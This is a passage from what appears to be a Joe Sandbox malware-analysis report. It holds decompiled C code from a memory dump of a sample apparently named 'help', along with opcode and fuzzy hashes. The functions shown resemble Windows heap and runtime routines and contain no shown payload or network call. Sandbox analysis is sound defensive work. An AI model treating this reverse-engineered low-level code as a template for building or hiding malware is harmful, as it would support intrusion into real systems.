                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                            							} while (_t38 < _v8 + _t35);
                            							_t44 = _v20;
                            						}
                            					}
                            					_t26 =  *0x38b84c4; // 0x0
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                            				}
                            				return _t44;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62743053dec39f6f18dbe38a5161e22e2b208b1b51ae22c723f60cc0435b5bb3
                            • Instruction ID: 6e0ab1eead82c3de73e0ea13c57679e8f48f758091e5a054b2e563934320e803
                            • Opcode Fuzzy Hash: 62743053dec39f6f18dbe38a5161e22e2b208b1b51ae22c723f60cc0435b5bb3
                            • Instruction Fuzzy Hash: 9C21A172A00609AFD704EF98CD81F5AB7BDFB44708F2500A8EA08EB251D371EE15DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E03846CF0(void* __edx, intOrPtr _a4, short _a8) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v28;
                            				char _v36;
                            				char _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed char* _t21;
                            				void* _t24;
                            				void* _t36;
                            				void* _t38;
                            				void* _t46;
                            
                            				_push(_t36);
                            				_t46 = __edx;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v20 = 0;
                            				_v16 = 0;
                            				if(E037E7D50() == 0) {
                            					_t21 = 0x7ffe0384;
                            				} else {
                            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                            				}
                            				if( *_t21 != 0) {
                            					_t21 =  *[fs:0x30];
                            					if((_t21[0x240] & 0x00000004) != 0) {
                            						if(E037E7D50() == 0) {
                            							_t21 = 0x7ffe0385;
                            						} else {
                            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                            						}
                            						if(( *_t21 & 0x00000020) != 0) {
                            							_t56 = _t46;
                            							if(_t46 == 0) {
                            								_t46 = 0x37a5c80;
                            							}
                            							_push(_t46);
                            							_push( &_v12);
                            							_t24 = E037FF6E0(_t36, 0, _t46, _t56);
                            							_push(_a4);
                            							_t38 = _t24;
                            							_push( &_v28);
                            							_t21 = E037FF6E0(_t38, 0, _t46, _t56);
                            							if(_t38 != 0) {
                            								if(_t21 != 0) {
                            									E03847016(_a8, 0, 0, 0,  &_v36,  &_v28);
                            									L037E2400( &_v52);
                            								}
                            								_t21 = L037E2400( &_v28);
                            							}
                            						}
                            					}
                            				}
                            				return _t21;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc0397b7dd1ce1177a3e65b73a6981101f25ecab7f58a1340393e3b5412eb263
                            • Instruction ID: 23fea52c2dc6a73dd87300fce06a9ad12f5c50160ec98c6b0f8f3b7f2e762c7a
                            • Opcode Fuzzy Hash: dc0397b7dd1ce1177a3e65b73a6981101f25ecab7f58a1340393e3b5412eb263
                            • Instruction Fuzzy Hash: 1321077250034D9FC311EFA8C948F67B7ECEF86644F080596F940DB651EB36C908C6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E0389070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                            				char _v8;
                            				intOrPtr _v11;
                            				signed int _v12;
                            				intOrPtr _v15;
                            				signed int _v16;
                            				intOrPtr _v28;
                            				void* __ebx;
                            				char* _t32;
                            				signed int* _t38;
                            				signed int _t60;
                            
                            				_t38 = __ecx;
                            				_v16 = __edx;
                            				_t60 = E038907DF(__ecx, __edx,  &_a4,  &_a8, 2);
                            				if(_t60 != 0) {
                            					_t7 = _t38 + 0x38; // 0x29cd5903
                            					_push( *_t7);
                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                            					_push( *_t9);
                            					_v12 = _a8 << 0xc;
                            					_t11 = _t38 + 4; // 0x5de58b5b
                            					_push(0x4000);
                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                            					E0388AFDE( &_v8,  &_v12);
                            					E03891293(_t38, _v28, _t60);
                            					if(E037E7D50() == 0) {
                            						_t32 = 0x7ffe0380;
                            					} else {
                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                            					}
                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                            						E038814FB(_t38,  *_t21, _v11, _v15, 0xd);
                            					}
                            				}
                            				return  ~_t60;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                            • Instruction ID: 6fcf1971f368bd329545756d85f7af61188d9b992f11a99f44902e8eaeeebaa0
                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                            • Instruction Fuzzy Hash: 2121F576204204AFDB05DF98CC84A6ABBA5EFC4350F0885AAF955DF781DB30D909CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E03847794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _t21;
                            				void* _t24;
                            				intOrPtr _t25;
                            				void* _t36;
                            				short _t39;
                            				signed char* _t42;
                            				unsigned int _t46;
                            				void* _t50;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t21 =  *0x38b7b9c; // 0x0
                            				_t46 = _a8;
                            				_v12 = __edx;
                            				_v8 = __ecx;
                            				_t4 = _t46 + 0x2e; // 0x2e
                            				_t36 = _t4;
                            				_t24 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                            				_t50 = _t24;
                            				if(_t50 != 0) {
                            					_t25 = _a4;
                            					if(_t25 == 5) {
                            						L3:
                            						_t39 = 0x14b1;
                            					} else {
                            						_t39 = 0x14b0;
                            						if(_t25 == 6) {
                            							goto L3;
                            						}
                            					}
                            					 *((short*)(_t50 + 6)) = _t39;
                            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                            					_t11 = _t50 + 0x2c; // 0x2c
                            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                            					E0380F3E0(_t11, _a12, _t46);
                            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                            					if(E037E7D50() == 0) {
                            						_t42 = 0x7ffe0384;
                            					} else {
                            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					}
                            					_push(_t50);
                            					_t19 = _t36 - 0x20; // 0xe
                            					_push(0x403);
                            					_push( *_t42 & 0x000000ff);
                            					E03809AE0();
                            					_t24 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                            				}
                            				return _t24;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0686688f49716a1479bd593185c69908e0881adb120f06cb77870b0ba4aeae1b
                            • Instruction ID: b52e948fa94edc12425b1b45bcd968e53355f191068fe60da0f0455dda5b5e15
                            • Opcode Fuzzy Hash: 0686688f49716a1479bd593185c69908e0881adb120f06cb77870b0ba4aeae1b
                            • Instruction Fuzzy Hash: 2F21A176500648ABC725DFA9DC84E6BB7A8EF8C340F1445ADF51ADBB90D734E900CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E037EAE73(intOrPtr __ecx, void* __edx) {
                            				intOrPtr _v8;
                            				void* _t19;
                            				char* _t22;
                            				signed char* _t24;
                            				intOrPtr _t25;
                            				intOrPtr _t27;
                            				void* _t31;
                            				intOrPtr _t36;
                            				char* _t38;
                            				signed char* _t42;
                            
                            				_push(__ecx);
                            				_t31 = __edx;
                            				_v8 = __ecx;
                            				_t19 = E037E7D50();
                            				_t38 = 0x7ffe0384;
                            				if(_t19 != 0) {
                            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            				} else {
                            					_t22 = 0x7ffe0384;
                            				}
                            				_t42 = 0x7ffe0385;
                            				if( *_t22 != 0) {
                            					if(E037E7D50() == 0) {
                            						_t24 = 0x7ffe0385;
                            					} else {
                            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            					}
                            					if(( *_t24 & 0x00000010) != 0) {
                            						goto L17;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					_t27 = E037E7D50();
                            					if(_t27 != 0) {
                            						_t27 =  *[fs:0x30];
                            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                            					}
                            					if( *_t38 != 0) {
                            						_t27 =  *[fs:0x30];
                            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                            							goto L5;
                            						}
                            						_t27 = E037E7D50();
                            						if(_t27 != 0) {
                            							_t27 =  *[fs:0x30];
                            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                            						}
                            						if(( *_t42 & 0x00000020) != 0) {
                            							L17:
                            							_t25 = _v8;
                            							_t36 = 0;
                            							if(_t25 != 0) {
                            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                            							}
                            							_t27 = E03847794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                            						}
                            						goto L5;
                            					} else {
                            						L5:
                            						return _t27;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                            • Instruction ID: 48aab7f8f89c5664b9e3db7c50d020e9cb11b4db46fd2959f1b564a3aea906de
                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                            • Instruction Fuzzy Hash: 34219D71A01685DFDB26DBA9D948B25B7E8AF49650F1D04E0ED04CB7A2E778DC40C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E037FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                            				intOrPtr _v8;
                            				void* _t19;
                            				intOrPtr _t29;
                            				intOrPtr _t32;
                            				intOrPtr _t35;
                            				intOrPtr _t37;
                            				intOrPtr* _t40;
                            
                            				_t35 = __edx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t37 = 0;
                            				_v8 = __edx;
                            				_t29 = __ecx;
                            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                            					L3:
                            					_t19 = _a4 - 4;
                            					if(_t19 != 0) {
                            						if(_t19 != 1) {
                            							L7:
                            							return _t37;
                            						}
                            						if(_t35 == 0) {
                            							L11:
                            							_t37 = 0xc000000d;
                            							goto L7;
                            						}
                            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                            							_t35 = _v8;
                            						}
                            						 *((intOrPtr*)(_t40 + 4)) = _t35;
                            						goto L7;
                            					}
                            					if(_t29 == 0) {
                            						goto L11;
                            					}
                            					_t32 =  *_t40;
                            					if(_t32 != 0) {
                            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                            						E037D76E2( *_t40);
                            					}
                            					 *_t40 = _t29;
                            					goto L7;
                            				}
                            				_t40 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                            				if(_t40 == 0) {
                            					_t37 = 0xc0000017;
                            					goto L7;
                            				}
                            				_t35 = _v8;
                            				 *_t40 = 0;
                            				 *((intOrPtr*)(_t40 + 4)) = 0;
                            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                            				goto L3;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                            • Instruction ID: 044a390a39fa1bcfbc37c8109237b82a8c6790ccdd648f2cb6d489bd61859fd3
                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                            • Instruction Fuzzy Hash: FC217972A00A40DFC735CF4AC550A66F7E9FB94A10F2881AEEA499B715DB30AC00DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E037FB390(void* __ecx, intOrPtr _a4) {
                            				signed int _v8;
                            				signed char _t12;
                            				signed int _t16;
                            				signed int _t21;
                            				void* _t28;
                            				signed int _t30;
                            				signed int _t36;
                            				signed int _t41;
                            
                            				_push(__ecx);
                            				_t41 = _a4 + 0xffffffb8;
                            				E037E2280(_t12, 0x38b8608);
                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                            				asm("sbb edi, edi");
                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                            				_v8 = _t36;
                            				asm("lock cmpxchg [ebx], ecx");
                            				_t30 = 1;
                            				if(1 != 1) {
                            					while(1) {
                            						_t21 = _t30 & 0x00000006;
                            						_t16 = _t30;
                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                            						asm("lock cmpxchg [edi], esi");
                            						if(_t16 == _t30) {
                            							break;
                            						}
                            						_t30 = _t16;
                            					}
                            					_t36 = _v8;
                            					if(_t21 == 2) {
                            						_t16 = E038000C2(0x38b8608, 0, _t28);
                            					}
                            				}
                            				if(_t36 != 0) {
                            					_t16 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                            				}
                            				return _t16;
                            			}












                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d900e233e38c22d3d01bc4a6809043043cffbd1764dede1e6214d04bef13bec6
                            • Instruction ID: b1842dd9931762293f799491fafd8bc7c71ffedb86e5505003e3761d904736f6
                            • Opcode Fuzzy Hash: d900e233e38c22d3d01bc4a6809043043cffbd1764dede1e6214d04bef13bec6
                            • Instruction Fuzzy Hash: 7A114C373412145FCB1CDA54CD81A6B726AEFCA330B2901ADDE16CB390C9755C02C6D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E037C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t41;
                            				intOrPtr* _t46;
                            				void* _t48;
                            				intOrPtr _t50;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr _t62;
                            				intOrPtr _t65;
                            				void* _t66;
                            				void* _t68;
                            
                            				_push(0xc);
                            				_push(0x389f708);
                            				E0381D08C(__ebx, __edi, __esi);
                            				_t65 = __ecx;
                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                            				if( *(__ecx + 0x24) != 0) {
                            					_push( *(__ecx + 0x24));
                            					E038095D0();
                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                            				}
                            				L6();
                            				L6();
                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                            				E038095D0();
                            				_t33 =  *0x38b84c4; // 0x0
                            				L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                            				_t37 =  *0x38b84c4; // 0x0
                            				L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                            				_t41 =  *0x38b84c4; // 0x0
                            				E037E2280(L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x38b86b4);
                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                            				_t46 = _t65 + 0xe8;
                            				_t62 =  *_t46;
                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                            					_t61 = 3;
                            					asm("int 0x29");
                            					_push(_t65);
                            					_t66 = _t61;
                            					_t23 = _t66 + 0x14; // 0x8df8084c
                            					_push( *_t23);
                            					E038095D0();
                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                            					_push( *_t24);
                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                            					_t48 = E038095D0();
                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                            					return _t48;
                            				} else {
                            					 *_t60 = _t62;
                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                            					 *(_t68 - 4) = 0xfffffffe;
                            					E037C9325();
                            					_t50 =  *0x38b84c4; // 0x0
                            					return E0381D0D1(L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                            				}
                            			}
















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 68eedb1a4338a32571d28ba3c69fc69b736c19566ebffc8b0c27e648e3b080c6
                            • Instruction ID: cdbad64e0eb9d1bfbbf33000541865fb01396354455e5dcbfe8d4e54a1a21a72
                            • Opcode Fuzzy Hash: 68eedb1a4338a32571d28ba3c69fc69b736c19566ebffc8b0c27e648e3b080c6
                            • Instruction Fuzzy Hash: D0215736051A80DFC765EF68CA04F5AB7BDBF08704F0449ACE14A8A6A2DB34E951DB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E03854257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                            				intOrPtr* _t18;
                            				intOrPtr _t24;
                            				intOrPtr* _t27;
                            				intOrPtr* _t30;
                            				intOrPtr* _t31;
                            				intOrPtr _t33;
                            				intOrPtr* _t34;
                            				intOrPtr* _t35;
                            				void* _t37;
                            				void* _t38;
                            				void* _t39;
                            				void* _t43;
                            
                            				_t39 = __eflags;
                            				_t35 = __edi;
                            				_push(8);
                            				_push(0x38a08d0);
                            				E0381D08C(__ebx, __edi, __esi);
                            				_t37 = __ecx;
                            				E038541E8(__ebx, __edi, __ecx, _t39);
                            				E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                            				_t18 = _t37 + 8;
                            				_t33 =  *_t18;
                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                            					L8:
                            					_push(3);
                            					asm("int 0x29");
                            				} else {
                            					 *_t27 = _t33;
                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                            					_t35 = 0x38b87e4;
                            					_t18 =  *0x38b87e0; // 0x0
                            					while(_t18 != 0) {
                            						_t43 = _t18 -  *0x38b5cd0; // 0xffffffff
                            						if(_t43 >= 0) {
                            							_t31 =  *0x38b87e4; // 0x0
                            							_t18 =  *_t31;
                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                            								goto L8;
                            							} else {
                            								 *0x38b87e4 = _t18;
                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                            								L037C7055(_t31 + 0xfffffff8);
                            								_t24 =  *0x38b87e0; // 0x0
                            								_t18 = _t24 - 1;
                            								 *0x38b87e0 = _t18;
                            								continue;
                            							}
                            						}
                            						goto L9;
                            					}
                            				}
                            				L9:
                            				__eflags =  *0x38b5cd0;
                            				if( *0x38b5cd0 <= 0) {
                            					L037C7055(_t37);
                            				} else {
                            					_t30 = _t37 + 8;
                            					_t34 =  *0x38b87e8; // 0x0
                            					__eflags =  *_t34 - _t35;
                            					if( *_t34 != _t35) {
                            						goto L8;
                            					} else {
                            						 *_t30 = _t35;
                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                            						 *_t34 = _t30;
                            						 *0x38b87e8 = _t30;
                            						 *0x38b87e0 = _t18 + 1;
                            					}
                            				}
                            				 *(_t38 - 4) = 0xfffffffe;
                            				return E0381D0D1(L03854320());
                            			}
















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 526836517e619e842d357cf3e95f3e4f8566fbd7acd7577abcfdc2d10300ab5e
                            • Instruction ID: eb418bb0ea00408afe22a9892c5691f015bbd837ee004cde360146422e86875e
                            • Opcode Fuzzy Hash: 526836517e619e842d357cf3e95f3e4f8566fbd7acd7577abcfdc2d10300ab5e
                            • Instruction Fuzzy Hash: 4D215B74500B56CFC725EFA9D000A54BBF9FB85319B6482EEE529CF298EB31D482CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 29%
                            			E037F2397(intOrPtr _a4) {
                            				void* __ebx;
                            				void* __ecx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t11;
                            				void* _t19;
                            				void* _t25;
                            				void* _t26;
                            				intOrPtr _t27;
                            				void* _t28;
                            				void* _t29;
                            
                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                            				if( *0x38b848c != 0) {
                            					L037EFAD0(0x38b8610);
                            					if( *0x38b848c == 0) {
                            						E037EFA00(0x38b8610, _t19, _t27, 0x38b8610);
                            						goto L1;
                            					} else {
                            						_push(0);
                            						_push(_a4);
                            						_t26 = 4;
                            						_t29 = E037F2581(0x38b8610, 0x37a50a0, _t26, _t27, _t28);
                            						E037EFA00(0x38b8610, 0x37a50a0, _t27, 0x38b8610);
                            					}
                            				} else {
                            					L1:
                            					_t11 =  *0x38b8614; // 0x0
                            					if(_t11 == 0) {
                            						_t11 = E03804886(0x37a1088, 1, 0x38b8614);
                            					}
                            					_push(0);
                            					_push(_a4);
                            					_t25 = 4;
                            					_t29 = E037F2581(0x38b8610, (_t11 << 4) + 0x37a5070, _t25, _t27, _t28);
                            				}
                            				if(_t29 != 0) {
                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                            					 *((char*)(_t29 + 0x40)) = 0;
                            				}
                            				return _t29;
                            			}
















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b9ee29bba09bd0e2a2d53cb2c10606586b63ba08b342b8e1f4a71ae7d53a584d
                            • Instruction ID: aaa8f9320a3283434312f6f0c39ad0280d679e5fe835b19c82e15a699cd9572d
                            • Opcode Fuzzy Hash: b9ee29bba09bd0e2a2d53cb2c10606586b63ba08b342b8e1f4a71ae7d53a584d
                            • Instruction Fuzzy Hash: 2C114875600B446FE620E6799C84B26B39DFF95620F1848A6E702DF382DAB0D8009654
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E038446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                            				signed short* _v8;
                            				unsigned int _v12;
                            				intOrPtr _v16;
                            				signed int _t22;
                            				signed char _t23;
                            				short _t32;
                            				void* _t38;
                            				char* _t40;
                            
                            				_v12 = __edx;
                            				_t29 = 0;
                            				_v8 = __ecx;
                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                            				_t38 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                            				if(_t38 != 0) {
                            					_t40 = _a4;
                            					 *_t40 = 1;
                            					E0380F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                            					_t22 = _v12 >> 1;
                            					_t32 = 0x2e;
                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                            					_t23 = E037FD268(_t38, 1);
                            					asm("sbb al, al");
                            					 *_t40 =  ~_t23 + 1;
                            					L037E77F0(_v16, 0, _t38);
                            				} else {
                            					 *_a4 = 0;
                            					_t29 = 0xc0000017;
                            				}
                            				return _t29;
                            			}












                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                            • Instruction ID: 9ffafb88391722ba500e281df4e73f839b4831a058870b0fcf86898703a82a74
